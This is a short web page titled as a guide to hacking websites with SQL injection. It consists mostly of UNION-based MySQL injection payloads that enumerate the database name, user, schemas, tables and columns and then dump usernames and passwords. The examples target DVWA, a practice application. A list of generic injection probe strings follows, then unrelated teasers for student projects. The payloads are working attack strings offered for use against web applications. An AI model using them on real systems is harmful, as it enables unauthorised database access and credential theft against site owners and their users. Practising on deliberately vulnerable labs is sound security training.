What is SQL Injection - Hack Website with SQL Injection
Basic Payload
' union select 1,2 --
Get Database Name
' union select database(),2 --
Get Username
' union select user(),null --
Get Databases
' union select distinct table_schema, null from information_schema.tables--
Get Tables
' union select null, TABLE_NAME from information_schema.tables where table_schema='DATABASE_NAME'--
Example
' union select null, TABLE_NAME from information_schema.tables where table_schema='dvwa'--
Get COLUMNS
' union select null, COLUMN_NAME from information_schema.COLUMNS where table_schema='DATABASE_NAME' AND TABLE_NAME='TABLE_NAME'--
Example
' union select null, COLUMN_NAME from information_schema.COLUMNS where table_schema='dvwa' AND TABLE_NAME='users'--
Get Data from Table
' union select username, password from DATABASE_NAME.TABLE_NAME --
Example
' union select username, password from dvwa.users --
Generic Payloads:
'
"
''
`
``
,
""
/
//
\
;
' or "
-- or #
' OR '1
' OR 1 -- -
" OR "" = "
" OR 1 = 1 -- -
' OR '' = '
'='
'LIKE'
'=0--+
OR 1=1
' OR 'x'='x
' AND id IS NULL; --
'''''''''''''UNION SELECT '2
%00
/*…*/
SQL Injection Cheat Sheet
http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet
World war 3
World War III is a computer as well as android game and main purpose of this game is to im...
Automated meter reading system
In Pakistan there is a manual electric meter reading system in which the electric pro...
Vision with Action: Introducing user friendly electronic stethoscope
Our primary focus is to make an easily portable wireless electronic stethoscope having Blu...
MOBILE PLATFORM DRIVER MONITORING AND SAFETY SYSTEM
Around the world, the total number of fatal road crashes is increasing regardless of the i...
Crime Rate Detector
Using AI and machine learning, we have to design a prediction model which will pred...